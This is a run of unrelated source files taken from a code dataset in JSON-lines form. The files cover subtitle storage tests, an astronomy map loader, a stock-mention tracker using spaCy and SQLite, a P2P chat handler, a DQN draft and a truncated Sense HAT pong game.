pass\nprint('Finished! File contains ' + str(counter) + ' networks.')\nprint('Encountered ' + str(errorcount) + ' errors. Please check standard '\n 'output for errors.')\n\n\n\n\n","repo_name":"boopboop42/IPconversionTools","sub_path":"IPrange2CIDR.py","file_name":"IPrange2CIDR.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23801718505","text":"from lxml import etree\nfrom unittest import TestCase\n\nfrom babelsubs import storage\nfrom babelsubs.generators.html import HTMLGenerator\nfrom babelsubs.generators.srt import SRTGenerator\nfrom babelsubs.parsers import SubtitleParserError\nfrom babelsubs.tests import utils\nfrom babelsubs import utils as main_utils\n\nclass TimeHandlingTest(TestCase):\n\n def test_split(self):\n # should looke like 1h:10:20:200\n milliseconds = (((1 * 3600 ) + (10 * 60 ) + (20 )) * 1000 ) + 200\n components = main_utils.milliseconds_to_time_clock_components(milliseconds)\n self.assertEquals(dict(hours=1,minutes=10, seconds=20, milliseconds=200), components)\n \n def test_rounding(self):\n milliseconds = (((1 * 3600 ) + (10 * 60 ) + (20 )) * 1000 ) + 200.40\n components = main_utils.milliseconds_to_time_clock_components(milliseconds)\n self.assertEquals(dict(hours=1, minutes=10, seconds=20, milliseconds=200), components)\n\n def test_none(self):\n self.assertEquals(dict(hours=0,minutes=0, seconds=0, milliseconds=0), main_utils.milliseconds_to_time_clock_components(0))\n\n\n def test_expression(self):\n # should looke like 1h:10:20:200\n milliseconds = (((1 * 3600 ) + (10 * 60 ) + (20 )) * 1000 ) + 200\n self.assertEquals(\"01:10:20.200\", storage.milliseconds_to_time_clock_exp(milliseconds))\n\n\n def test_time_expression_to_milliseconds_clock_time_fraction(self):\n milliseconds = (((3 * 3600 ) + (20 * 60 ) + (40 )) * 1000 ) + 200\n self.assertEquals(storage.time_expression_to_milliseconds(\"03:20:40.200\"), milliseconds)\n \n def test_parse_time_expression_clock_time(self):\n milliseconds = (((3 * 3600 ) + (20 * 60 ) + (40 )) * 1000 ) \n self.assertEquals(storage.time_expression_to_milliseconds(\"03:20:40\"), milliseconds)\n\n\n def test_parse_time_expression_metric(self):\n self.assertEquals(storage.time_expression_to_milliseconds(\"10h\"), 10 * 3600 * 1000)\n self.assertEquals(storage.time_expression_to_milliseconds(\"5m\"), 5 * 60 * 1000)\n self.assertEquals(storage.time_expression_to_milliseconds(\"3000s\"), 3000 * 1000)\n self.assertEquals(storage.time_expression_to_milliseconds(\"5000ms\"), 5000)\n \n\n def test_parse_time_expression_clock_regex(self):\n def _components(expression, hours, minutes, seconds, fraction):\n match = storage.TIME_EXPRESSION_CLOCK_TIME.match(expression)\n self.assertTrue(match)\n self.assertEquals(int(match.groupdict()['hours']), hours)\n self.assertEquals(int(match.groupdict()['minutes']), minutes)\n self.assertEquals(int(match.groupdict()['seconds']), seconds)\n try:\n self.assertEquals(int(match.groupdict()['fraction']), fraction)\n except (ValueError, TypeError):\n self.assertEquals(fraction, None)\n\n\n _components(\"00:03:02\", 0, 3, 2, None)\n _components(\"100:03:02\", 100, 3, 2, None)\n _components(\"100:03:02.200\", 100, 3, 2, 200)\n\n\n def test_normalize_time(self):\n content_str = open(utils.get_data_file_path(\"normalize-time.dfxp\") ).read()\n dfxp = storage.SubtitleSet('en', content_str, normalize_time=True)\n subs = dfxp.get_subtitles()\n self.assertTrue(len(dfxp) )\n for el in subs:\n self.assertIn(\"begin\", el.attrib)\n self.assertTrue(storage.TIME_EXPRESSION_CLOCK_TIME.match(el.attrib['begin']))\n self.assertIn(\"end\", el.attrib)\n self.assertTrue(storage.TIME_EXPRESSION_CLOCK_TIME.match(el.attrib['end']))\n self.assertNotIn('dur', el.attrib)\n self.assertEqual(subs[5].attrib['end'], '00:01:05.540')\n\nclass AddSubtitlesTest(TestCase):\n\n def _paragraphs_in_div(self, el):\n return [x for x in el.getchildren() if x.tag.endswith(\"}p\")]\n \n def test_new_paragraph(self):\n dfxp = storage.SubtitleSet('en')\n # first sub is always a paragraph break ;)\n dfxp.append_subtitle(0, 1000, \"paragraph 1 - A\")\n dfxp.append_subtitle(1000, 2000, \"paragraph 1 - B\")\n dfxp.append_subtitle(2000, 3000, \"paragraph 2 - A\", new_paragraph=True)\n dfxp.append_subtitle(3000, 4000, \"paragraph 2 - B\", new_paragraph=False)\n dfxp.append_subtitle(3000, 4000, \"paragraph 2 - C\")\n divs = dfxp._ttml.xpath('/n:tt/n:body/n:div', namespaces={'n': storage.TTML_NAMESPACE_URI})\n self.assertEquals(len(divs), 2)\n self.assertEquals(len(self._paragraphs_in_div(divs[0])), 2)\n self.assertEquals(len(self._paragraphs_in_div(divs[1])), 3)\n sub_lines = dfxp.subtitle_items()\n\n # make sure subtitle items returns the right metadata\n self.assertTrue(sub_lines[0].meta['new_paragraph'])\n self.assertFalse(sub_lines[1].meta['new_paragraph'])\n self.assertTrue(sub_lines[2].meta['new_paragraph'])\n self.assertFalse(sub_lines[3].meta['new_paragraph'])\n\n def test_no_timing(self):\n dfxp = storage.SubtitleSet('en')\n dfxp.append_subtitle(0, 1000, \"paragraph 1 - A\")\n dfxp.append_subtitle(2000, None, \"paragraph 1 - B\")\n dfxp.append_subtitle(None, None, \"paragraph 1 - C\")\n items = [x for x in dfxp.subtitle_items()]\n self.assertEquals(len(items), 3)\n self.assertEquals(items[0][0], 0)\n self.assertEquals(items[0][1], 1000)\n self.assertEquals(items[1][0], 2000)\n self.assertEquals(items[1][1], None)\n self.assertEquals(items[2][0], None)\n self.assertEquals(items[2][1], None)\n self.assertFalse(dfxp.fully_synced)\n dfxp = storage.SubtitleSet('en')\n dfxp.append_subtitle(0, 1000, \"paragraph 1 - A\")\n dfxp.append_subtitle(1000, 2000, \"paragraph 1 - B\")\n dfxp.append_subtitle(2000, 3000, \"paragraph 2 - A\", new_paragraph=True)\n dfxp.append_subtitle(3000, 4000, \"paragraph 2 - B\")\n dfxp.append_subtitle(3000, 4000, \"paragraph 2 - C\")\n self.assertTrue(dfxp.fully_synced)\n\n \n\n def test_escaping(self):\n dfxp = storage.SubtitleSet('en')\n dfxp.append_subtitle(0, 1000, \"Hey html anchor\", escape=False)\n dfxp.append_subtitle(0, 1000, \"Hey html anchor\", escape=True)\n self.assertEqual( storage.get_contents(dfxp.get_subtitles()[0]), 'Hey html anchor')\n self.assertEqual( storage.get_contents(dfxp.get_subtitles()[1]), 'Hey html anchor')\n \n def test_escaping_list(self):\n subtitles = ((0, 1000, \"Hey html anchor\", ),)\n dfxp = storage.SubtitleSet.from_list('en', subtitles)\n self.assertEqual( storage.get_contents(dfxp.get_subtitles()[0]), 'Hey html anchor')\n\n dfxp = storage.SubtitleSet.from_list('en', subtitles, escape=True)\n self.assertEqual( storage.get_contents(dfxp.get_subtitles()[0]), 'Hey html anchor')\n\n def test_paragraph_from_list(self):\n subs = []\n for x in xrange(0,10):\n subs.append((x * 1000, x*1000 + 999, \"Sub %x\" % x , {'new_paragraph': x%2 == 0}))\n\n dfxp = storage.SubtitleSet.from_list('en', subs)\n self.assertEqual(len(dfxp.get_subtitles()), 10)\n self.assertEqual(len(dfxp.subtitle_items()), 10)\n for i,sub in enumerate(dfxp.subtitle_items()):\n self.assertEqual(sub.meta['new_paragraph'] , i % 2 ==0)\n\n def test_control_chars_from_list(self):\n subs = [\n # normal sub\n (1000, 1100, \"Sub 1\", {'new_paragraph': True}),\n # sub with an invalid control char\n (2000, 2100, \"Sub 2\\x15\", {'new_paragraph': False}),\n ]\n dfxp = storage.SubtitleSet.from_list('en', subs)\n subtitle_items = dfxp.subtitle_items()\n self.assertEquals(subtitle_items[0].text, u'Sub 1')\n self.assertEquals(subtitle_items[1].text, u'Sub 2')\n\n def test_nested_tags(self):\n dfxp = utils.get_subs(\"simple.dfxp\").to_internal()\n self.assertEqual( storage.get_contents(dfxp.get_subtitles()[37]), 'nested spans')\n self.assertEqual( storage.get_contents(dfxp.get_subtitles()[38]), 'a word on nested spans')\n\n def test_nested_with_markup(self):\n dfxp = utils.get_subs(\"simple.dfxp\").to_internal()\n self.assertEqual( dfxp.get_content_with_markup(dfxp.get_subtitles()[38],\n dict(linebreaks=\"\\r\\n\", bold=\"%s\",\n italics=\"%s\", underline=\"%s\")),\n 'a word on nested spans')\n\n def test_region(self):\n subs = storage.SubtitleSet('en')\n subs.append_subtitle(0, 1000, \"test\", region=\"top\")\n elt = subs.get_subtitles()[0]\n self.assertEqual(elt.attrib['region'], 'top')\n\nclass AccessTest(TestCase):\n\n def test_indexing(self):\n subs = [\n (0, 1000, 'Hi'),\n (2000, 3000, 'How are you?'),\n ]\n ss = storage.SubtitleSet.from_list('en', subs)\n # make sure that from_list ends up with a usable list\n self.assertIsNotNone(ss[0])\n self.assertIsNotNone(ss[1])\n\nclass ParsingTest(TestCase):\n\n def test_f_dfxp(self):\n # tests a pretty feature rich dfpx file\n self.assertRaises(SubtitleParserError, utils.get_subs, \"from-n.dfxp\")\n\n\n\n def test_unsynced_as_generated_from_frontend(self):\n dfxp = utils.get_subs(\"dfxp-as-front-end-no-sync.dfxp\").to_internal()\n for sub in dfxp.subtitle_items():\n self.assertEqual(None, sub.start_time)\n self.assertEqual(None, sub.end_time)\n\n def test_comments(self):\n # test that the subtitle_items() method doesn't throw an exception\n # when there are comments in the DFXP. See gh-841 for details.\n dfxp = utils.get_subs(\"comments.dfxp\").to_internal()\n list(dfxp.subtitle_items())\n list(dfxp.subtitle_items(mappings=HTMLGenerator.MAPPINGS))\n\nclass UpdateTest(TestCase):\n\n def test_update_start_time(self):\n dfxp = utils.get_subs(\"pre-dmr.dfxp\").to_internal()\n dfxp_updated = utils.get_subs(\"pre-dmr.dfxp\").to_internal()\n for i in xrange(0, len(dfxp)):\n dfxp_updated.update(i, from_ms=1000*i)\n for i,sub in enumerate(dfxp_updated.subtitle_items()):\n self.assertEqual(i * 1000, sub.start_time)\n\n\n def test_update_end_time(self):\n dfxp = utils.get_subs(\"pre-dmr.dfxp\").to_internal()\n dfxp_updated = utils.get_subs(\"pre-dmr.dfxp\").to_internal()\n for i in xrange(0, len(dfxp)):\n dfxp_updated.update(i, to_ms=1000*i)\n for i,sub in enumerate(dfxp_updated.subtitle_items()):\n self.assertEqual(i * 1000, sub.end_time)\n\n def test_update_language_code(self):\n subs = utils.get_subs(\"simple.dfxp\").to_internal()\n subs.set_language('fr')\n lang_attr_name = '{http://www.w3.org/XML/1998/namespace}lang'\n self.assertEquals(subs._ttml.get(lang_attr_name), 'fr')\n\nclass SubtitleXMLFormattingTest(TestCase):\n def setUp(self):\n ttml = etree.fromstring('
')\n self.subtitles = storage.SubtitleSet.create_with_raw_ttml(ttml)\n\n def test_empty_subs(self):\n utils.assert_long_text_equal(self.subtitles.to_xml(), \"\"\"\\\n\n \n \n
\n \n\n\"\"\")\n\n\n def test_with_subs(self):\n self.subtitles.append_subtitle(1000, 1500, \"content\")\n self.subtitles.append_subtitle(2000, 2500, \"content\", escape=False)\n self.subtitles.append_subtitle(3000, 3500, \" content with space \")\n utils.assert_long_text_equal(self.subtitles.to_xml(), \"\"\"\\\n\n \n \n
\n

content

\n

content

\n

content with space

\n
\n \n
\n\"\"\")\n\n def test_with_new_paragraph(self):\n self.subtitles.append_subtitle(1000, 1500, \"content\")\n self.subtitles.append_subtitle(2000, 2500, \"content 2\", new_paragraph=True)\n utils.assert_long_text_equal(self.subtitles.to_xml(), \"\"\"\\\n\n \n \n
\n

content

\n
\n
\n

content 2

\n
\n \n
\n\"\"\")\n","repo_name":"pculture/babelsubs","sub_path":"babelsubs/tests/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":12797,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"6135670807","text":"import numpy as np\nimport os\nfrom astropy.io import fits\n#import matplotlib.pyplot as plt\n\ncat_dir = ''\nssp_dir = ''\nmask_dir = ''\n\nhdu_cat = fits.open(cat_dir + 'TNG50_MaNGA_v13_Nview.fits')\nsnaps = hdu_cat[1].data['snapshot']\nsubhalo_id = hdu_cat[1].data['subhalo_id']\nifu_dsn = hdu_cat[1].data['manga_ifu_dsn']\nviews = hdu_cat[1].data['view']\n\n# mocks are not available for view>5, snap=0 or a few that got stopped \n# in the mocking process. Total mocks should be >10,0030.\n\n\nifu_masks, hdr = fits.getdata(mask_dir+'masks.fits', 0, header=True)\nSN = 3 # signal to noise cut in the i-flux, \n # generally 3 is enough to remove the large voronoi-like bins of the edges,\n # some galaxies might need a greater SN threshold\n\nind_in_cat = []\nband_maps = []\nvel_maps = []\ndisp_maps = []\nfor ii in range(10):#len(snaps)):\n ssp_name = ssp_dir + 'ilust-'+str(snaps[ii])+'-'+str(subhalo_id[ii])+\\\n '-'+str(views[ii])+'-127.cube.SSP.cube.fits.gz'\n if not os.path.exists(ssp_name):\n continue\n\n ssp_f = fits.open(ssp_name)\n sn_mask = np.where(ssp_f[0].data[3]/ssp_f[0].data[4]>SN, 1, np.nan)\n ifu_mask_ = np.where(ifu_masks[hdr['MASK'+str(ifu_dsn[0])]]==1, 1, np.nan)\n band_map_ = ssp_f[0].data[0] * ifu_mask_ * sn_mask\n band_maps.append(band_map_)\n vel_map_ = ssp_f[0].data[13] * ifu_mask_ * sn_mask\n vel_maps.append(vel_map_)\n disp_map_ = ssp_f[0].data[15] * ifu_mask_ * sn_mask\n disp_maps.append(disp_map_)\n \n ind_in_cat.append(ii)\n #plt.imshow(vel_map_)\n #plt.colorbar()\n #plt.show()\n\nband_maps = np.array(band_maps, dtype=np.float32)\nvel_maps = np.array(vel_maps, dtype=np.float32)\ndisp_maps = np.array(disp_maps, dtype=np.float32)\n\n","repo_name":"reginasar/using_MaNGIA","sub_path":"read_ssp.py","file_name":"read_ssp.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22476156403","text":"import spacy\nimport sqlite3\nimport pandas as pd\nimport json\nimport robin_stocks as r\nimport yfinance as yf\nimport re, string\nfrom os import makedirs, getcwd, path\nimport threading\nfrom datetime import datetime, timedelta\n#for the user, associate the user with the most recent stock he/she disccussed about\n#we can use the basic youtube trading algo for long term invtestment\n#use kelly formula, based the percentage on the faith of the discord chat\n\n#https://www.youtube.com/watch?v=Hi-zhLgP_TQ&ab_channel=%E5%BC%82%E7%95%8C%E7%95%AA%E8%8C%84%E8%AF%B4%E7%BE%8E%E8%82%A1\n#https://www.youtube.com/watch?v=FZ9Kf1xfA40&ab_channel=%E5%BC%82%E7%95%8C%E7%95%AA%E8%8C%84%E8%AF%B4%E7%BE%8E%E8%82%A1\n#theory of large numbers maybe each user in discord's call is following a prob distribution\n'''\nhigh cred: first to call out stock\n\t\tshortest duration\n\t\thighest gain\n\t\tlow number of people call out the same stock\n\t\t#returns prob of wining vs prob of losing and the amount to win and lose maxmize profit pass in kelly for each investment interval\n\t\t#the formula should mimic the behavior of a sigmoid function where x is the result from the parameters and y is the cred score\n\n\t\t#\\frac{6}{\\frac{1}{6}+e^{-x}\\ }\nlow: \n'''\n\n#\nimport logging\n\nclass VideoModel(object):\n\t#uses youtube model with kelly and discord chat faith determination\n\tdef __init__(self):\n\t\tpass\n\n\tdef kelly_formula(self):\n\t\tpass\n\n\n#this user can be removed each user its own table with \n#this allows to see which user have more influence on the stock market price is more accurate\n\n\nclass NLPstock(object):\n\tdef __init__(self, db_name=\"stocks.db\"):\n\t\tself.nlp = spacy.load(\"en_core_web_sm\")\n\t\tself.db_name = db_name\n\n\t\tself._current_time = datetime.now()\n\t\tself._date = self.current_time.date()\n\n\t@property\n\tdef current_time(self):\n\t\treturn self._current_time\n\t\t\n\t@current_time.setter \n\tdef current_time(self, ct):\n\t\t#self.start_hours = ct.replace(hour=9, minute=30, second=0, microsecond=0)\n\t\t#self.end_hours = ct.replace(hour=16, minute=00, second=0, microsecond=0)\n\t\t\n\t\tif (ct.hour >= 5) and (ct.hour < 14):\n\t\t\tself._date = (ct + timedelta(days=-1)).date()\n\t\tlogging.info(f\"setting time.. current hour is {ct.hour}, {self._date} \")\n\n\t\tself._current_time = ct\n\n\n\n\tdef update_stock_table(self, stock_tk, message, c):\n\t\tc.execute(\"SELECT * FROM %s WHERE today = ?\" % (stock_tk), (str(self._date),)) \n\t\trows = c.fetchall()\n\n\t\tlogging.info(f\"try to fetch for {str(self._date)} stock is {stock_tk} result {rows}\")\n\n\t\tif rows:\n\t\t\tc.execute(\"UPDATE %s SET today_count = today_count + 1 WHERE today = ?\" % (stock_tk), (str(self._date),))\n\t\t\tlogging.info(f\"find existing {str(self._date)} for stock {stock_tk}\")\n\t\telse:\n\t\t\t#first time of the day\n\t\t\tc.execute('INSERT INTO %s VALUES (?,?,?,?,?)'% (stock_tk), (\n\t\t\t\tself._date,\n\t\t\t\t0,\n\t\t\t\tNone,\n\t\t\t\tmessage['author']['id'],\n\t\t\t\tmessage['timestamp']\n\t\t\t))\n\t\t\tlogging.info(f\"NO existing {str(self._date)} for stock {stock_tk} creating..... \")\n\n\n\n\tdef insert_stock(self, stock_tk, tk_value, message):\n\t\tlogging.info(f\"inserting stock {stock_tk}.......\")\n\t\tdbdir = path.join(getcwd(), 'data')\n\t\tif not path.exists(dbdir):\n\t\t\tmakedirs(dbdir)\n\n\t\tdbfile = path.join(dbdir, self.db_name)\n\t\tdb = sqlite3.connect(dbfile)\n\t\tc = db.cursor()\n\n\t\tc.execute('''CREATE TABLE IF NOT EXISTS stocks (\n\t\t\tticker TEXT NOT NULL PRIMARY KEY,\n\t\t\tname TEXT,\n\t\t\tcount INTEGER,\n\t\t\tcall_user TEXT,\n\t\t\tcall_price REAL,\n\t\t\tcall_time TEXT\n\t\t)''')\n\n\n\t\tc.execute('INSERT INTO %s VALUES (?,?,?,?,?,?)'% (\"stocks\"), (\n\t\t\tstock_tk,\n\t\t\ttk_value.info['longName'],\n\t\t\t0,\n\t\t\tmessage['author']['id'],\n\t\t\ttk_value.history('1d')['Close'][0], \n\t\t\tmessage['timestamp']\n\t\t))\n\n\t\t#when the stock is already made sure to be true\n\t\tc.execute('''CREATE TABLE IF NOT EXISTS %s (\n\t\t\ttoday TEXT NOT NULL PRIMARY KEY,\n\t\t\ttoday_count INTEGER,\n\t\t\ttop_user TEXT,\n\t\t\tfirst_call TEXT,\n\t\t\tcall_time TEXT\n\t\t)''' %(stock_tk)) \n\n\t\tself.update_stock_table(stock_tk, message, c)\n\n\t\tlogging.info(f\"{stock_tk} Insert Sucess\")\n\t\tdb.commit()\n\t\tdb.close()\n\n\n\tdef stock_in_table(self, stock_tk, message):\n\t\tlogging.info(f\"Finding stock {stock_tk} in tab\")\n\n\t\tdbdir = path.join(getcwd(), 'data')\n\t\tif not path.exists(dbdir):\n\t\t\tmakedirs(dbdir)\n\n\t\tdbfile = path.join(dbdir, self.db_name)\n\t\tdb = sqlite3.connect(dbfile)\n\t\tc = db.cursor()\n\n\t\tc.execute('''CREATE TABLE IF NOT EXISTS stocks (\n\t\t\tticker TEXT NOT NULL PRIMARY KEY,\n\t\t\tname TEXT,\n\t\t\tcount INTEGER,\n\t\t\tcall_user TEXT,\n\t\t\tcall_price REAL,\n\t\t\tcall_time TEXT\n\t\t)''')\n\n\t\t\n\t\tc.execute(\"SELECT * FROM stocks WHERE ticker = ?\", (stock_tk,)) \n\t\trows = c.fetchall()\n\t\t\n\t\tif rows:\n\t\t\tc.execute(\"UPDATE stocks SET count = count + 1 WHERE ticker = ?\", (stock_tk,))\n\t\t\tself.update_stock_table(stock_tk, message, c)\n\t\t\tdb.commit()\n\t\t\tdb.close()\n\t\t\treturn True\n\t\telse:\n\t\t\tdb.close()\n\t\t\treturn False\n\t\t\n\n\t\t\n\n\n\n\n\n\tdef get_stocks(self, message):\n\t\tstring_value = message['content']\n\t\tself.doc = self.nlp(string_value)\n\t\tstock_list = [x.text for x in self.doc.ents if x.label_ == \"ORG\"]\n\t\tstock_list += re.findall(\"[A-Z]{2,}\", string_value)\n\t\tstock_list = set(stock_list)\n\n\n\t\tstock_string = []\n\n\t\tfor stock in stock_list:\n\t\t\tprocessed_stock = self.process_org(stock, message)\n\t\t\tif processed_stock:\n\t\t\t\tstock_string.append(processed_stock)\n\n\t\treturn stock_string\n\n\n\n\n\n\tdef process_org(self, stock, message):#for processing the org into a ticker\n\t\tstock =stock.strip()\n\t\tstock = \" \".join(re.findall(\"[a-zA-Z]+\", stock))\n\t\tif (len(stock) > 4) or (len(stock) < 2):\n\t\t\t#print(f\"Failed: {stock}\")\n\t\t\tpass\n\t\telse:\n\t\t\ttry:\n\t\t\t\tif self.stock_in_table(stock, message):\n\t\t\t\t\tlogging.info(f\"{stock} already in table\")\n\t\t\t\t\treturn stock\n\n\t\t\t\ttk = yf.Ticker(stock)\n\t\t\t\t#t = threading.Thread()\n\t\t\t\tself.insert_stock(stock, tk, message)\n\t\t\t\treturn stock\n\n\t\t\texcept KeyError:\n\t\t\t\tlogging.info(f\"Yahoo cant find {stock}\")\n\t\t\texcept Exception as e:\n\t\t\t\tlogging.info(f'Weird stock bugg {stock}')\n\n\t\t\t#this means either it contains the $ or its not a stock we are looking for\n\n\n\n\n\t\n\n\n\nif __name__ == \"__main__\":\n\n\tpass\n","repo_name":"fredryce/stocker","sub_path":"textmine.py","file_name":"textmine.py","file_ext":"py","file_size_in_byte":5964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25191275665","text":"__author__ = 'kowalski'\n\nimport config\nimport base.net\nimport base.new_CSR\nimport base.text\n\n\ndef event_handler(number, conn=None):\n num = int(number[1:])\n # отключение или одного соединения, или мы - клиент\n if num == 1:\n if conn is None:\n base.text.write_to_screen(\"Соединение закрыто.\", \"System\")\n for i in config.send_array:\n i.send(\"-001\".encode())\n config.send_array.clear()\n config.get_array.clear()\n config.address_array.clear()\n else:\n base.text.write_to_screen(\"Соединение через \" + conn.getpeername()\n [0] + \" закрыто.\", \"System\")\n for i in config.send_array:\n if i.getpeername()[0] == conn.getpeername()[0]:\n config.send_array.remove(i)\n break\n config.get_array.remove(conn)\n config.address_array.remove(conn.getpeername()[0])\n # смена ник��\n elif num == 2:\n name = base.net.net_catch(conn)\n if (is_username_free(name)):\n base.text.write_to_screen(\n \"Пользователь \" + config.username_array[conn] +\n \" изменил свой ник на \" + name, \"System\")\n config.username_array[conn] = name\n config.contact_array[\n conn.getpeername()[0]] = [conn.getpeername()[1], name]\n # при подключении пользователя к серверу разослать его адрес и\n # порт для отрпавки сообщения\n elif num == 4:\n data = conn.recv(4)\n data = conn.recv(int(data.decode(encoding='UTF-8')))\n base.new_CSR.Client(data.decode(encoding='UTF-8'),\n int(config.contact_array[conn.getpeername()[0]][0])\n ).start()\n\n\ndef is_username_free(name):\n \"\"\"Прорверить, занят ли никнейм.\"\"\"\n for conn in config.username_array:\n if name == config.username_array[conn] or name == config.username:\n return False\n return True\n\n\ndef pass_friends(conn):\n \"\"\"Отправка информации о соединения пользователья к серверу текущим\n пользователям\"\"\"\n for connection in config.send_array:\n if conn.getpeername()[0] != connection.getpeername()[0]:\n conn.send(\"-004\".encode(encoding='UTF-8'))\n conn.send(\n base.net.format_number(len(connection.getpeername()[0]))\n .encode(encoding='UTF-8'))\n # отправка ip адреса\n conn.send(connection.getpeername()[0].encode(encoding='UTF-8'))\n","repo_name":"KowalskiP/University","sub_path":"Python/python-task/P2PChat/base/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1050543160","text":"def isPalidrome(s):\n n=len(s)\n if n==0:\n return False \n for i in range(0,n//2):\n if s[i]!=s[n-i-1]:\n return False\n return True\ndef solve(s,left,right,size):\n if left>=size+(right-size):\n print(s)\n return\n for i in range(left,right+1):\n if(isPalidrome(s[left:i])):\n str1=s[:i]+\" \"+s[i:]\n solve(str1,i+1,right+1,size)\n\ns=str(input())\n(solve(s,0,len(s),len(s)))","repo_name":"19521242bao/CS112.L13.KHCL","sub_path":"Chuỗi con.py","file_name":"Chuỗi con.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35143500941","text":"from baselines.ddpg.memory import Memory\nfrom baselines.ddpg.noise import *\nfrom src.config.config import Config\nimport tensorflow as tf\nimport itertools\nfrom src.model.tensorflowBasedModel import TensorflowBasedModel\nfrom src.model.utils.networkCreator import NetworkCreator\nimport tensorflow.contrib as tfcontrib\n\n\nclass DQNModel(TensorflowBasedModel):\n key_list = Config.load_json(file_path=None)\n\n def __init__(self, config, action_bound):\n super(DQNModel, self).__init__(config=config)\n self.proposed_action_list = []\n self.action_bound = action_bound\n action_list = []\n for i in range(len(action_bound[0])):\n low = action_bound[0][i]\n high = action_bound[1][i]\n action_list.append(np.arange(start=low,\n stop=high,\n step=(high - low) / self.config.config_dict['ACTION_SPLIT_COUNT']))\n action_iterator = itertools.product(*action_list)\n self.action_selection_list = []\n for action_sample in action_iterator:\n self.action_selection_list.append(tf.constant(action_sample))\n\n self.reward_input = tf.placeholder(shape=[None, 1], dtype=tf.float32)\n\n self.state_input = tf.placeholder(shape=[None] + list(self.config.config_dict['STATE_SPACE']), dtype=tf.float32)\n self.next_state_input = tf.placeholder(shape=[None] + list(self.config.config_dict['STATE_SPACE']),\n dtype=tf.float32)\n self.action_input = tf.placeholder(shape=[None] + list(self.config.config_dict['ACTION_SPACE']),\n dtype=tf.float32)\n self.done_input = tf.placeholder(shape=[None, 1], dtype=tf.bool)\n self.input = tf.concat([self.state_input, self.action_input])\n self.done = tf.cast(self.done_input, dtype=tf.float32)\n\n self.q_value_list = []\n var_list = None\n for action_sample in self.action_selection_list:\n q_net, q_output, var_list = NetworkCreator.create_network(input=tf.concat(self.state_input, action_sample),\n network_config=self.config.config_dict[\n 'NET_CONFIG'],\n net_name=self.config.config_dict['NAME'])\n self.q_value_list.append(q_output)\n self.var_list = var_list\n\n self.target_q_value_list = []\n for action_sample in self.action_selection_list:\n q_net, q_output, var_list = NetworkCreator.create_network(\n input=tf.concat(self.next_state_input, action_sample),\n network_config=self.config.config_dict[\n 'NET_CONFIG'],\n net_name='TARGET' + self.config.config_dict['NAME'])\n self.target_var_list.append(q_output)\n self.target_var_list = var_list\n\n self.loss, self.optimizer, self.optimize = self.create_training_method()\n self.update_target_q_op = self.create_target_q_update()\n self.memory = Memory(limit=1e100,\n action_shape=self.config.config_dict['ACTION_SPACE'],\n observation_shape=self.config.config_dict['STATE_SPACE'])\n self.sess = tf.get_default_session()\n\n def update(self):\n for i in range(self.config.config_dict['ITERATION_EVER_EPOCH']):\n batch_data = self.memory.sample(batch_size=self.config.config_dict['BATCH_SIZE'])\n loss = self.sess.run(fetches=[self.loss, self.optimize],\n feed_dict={\n self.reward_input: batch_data['rewards'],\n self.action_input: batch_data['actions'],\n self.state_input: batch_data['obs0'],\n self.done_input: batch_data['terminals1']\n })\n\n def predict(self, obs, q_value):\n pass\n\n def print_log_queue(self, status):\n self.status = status\n while self.log_queue.qsize() > 0:\n log = self.log_queue.get()\n print(\"%s: Critic loss %f: \" %\n (self.name, log[self.name + '_CRITIC']))\n log['INDEX'] = self.log_print_count\n self.log_file_content.append(log)\n self.log_print_count += 1\n\n def create_training_method(self):\n l1_l2 = tfcontrib.layers.l1_l2_regularizer()\n loss = tf.reduce_sum((self.predict_q_value - self.q_output) ** 2) + \\\n tfcontrib.layers.apply_regularization(l1_l2, weights_list=self.var_list)\n optimizer = tf.train.AdadeltaOptimizer(learning_rate=self.config.config_dict['LEARNING_RATE'])\n optimize_op = optimizer.minimize(loss=loss, var_list=self.var_list)\n return loss, optimizer, optimize_op\n\n def create_predict_q_value_op(self):\n\n predict_q_value = (1. - self.done) * self.config.config_dict['DISCOUNT'] * self.target_q_output \\\n + self.reward_input\n return predict_q_value\n\n def create_target_q_update(self):\n op = []\n for var, target_var in zip(self.var_list, self.target_var_list):\n ref_val = self.config.config_dict['DECAY'] * target_var + (1.0 - self.config.config_dict['DECAY']) * var\n op.append(tf.assign(ref_val, var))\n return op\n\n def store_one_sample(self, state, next_state, action, reward, done, *arg, **kwargs):\n self.memory.append(obs0=state,\n obs1=next_state,\n action=action,\n reward=reward,\n terminal1=done)\n","repo_name":"cap-ntu/intelligent-trainer","sub_path":"src/model/dqnModel/TEMPdqnModel.py","file_name":"TEMPdqnModel.py","file_ext":"py","file_size_in_byte":5826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39961936545","text":"from sense_hat import SenseHat, ACTION_PRESSED\nimport time\n\nsense = SenseHat()\nsense.clear()\n\n\nwhite = [255, 255, 255]\nred = [255, 0, 0]\ngreen = [0, 255, 0]\nblue = [0, 0, 255]\ncyan = [0, 255, 255]\npink = [255, 0, 255]\nyellow = [255, 255, 0]\ngray = [100, 100, 100]\noff = [0, 0, 0]\n\ngame_display = ( [off] * 8 * 7 ) + ( [gray] * 8 )\n\ndef set_game_pixel(x, y, color):\n global game_display\n game_display[ x + ( y * 8 ) ] = color\n\ndef update_game_display():\n global game_display\n game_display = ( [off] * 8 * 7 ) + ( [gray] * 8 )\n #for i in [-1, 0, 1]:\n # set_game_pixel(player.x + 1, player.y + i, color)\n # set_game_pixel(bot.x - 1, bot.y + 1, bot.color)\n set_game_pixel(ball.x, ball.y, ball.color)\n #for i in range(palyer.score):\n # set_game_pixel(i, 7, player.score_color)\n #for i in range(bot.score):\n # set_game_pixel(7 - i, 7, bot.score_color)\n\nclass Ball:\n def __init__(self, start_x, start_y, color):\n self.start_x = start_x\n 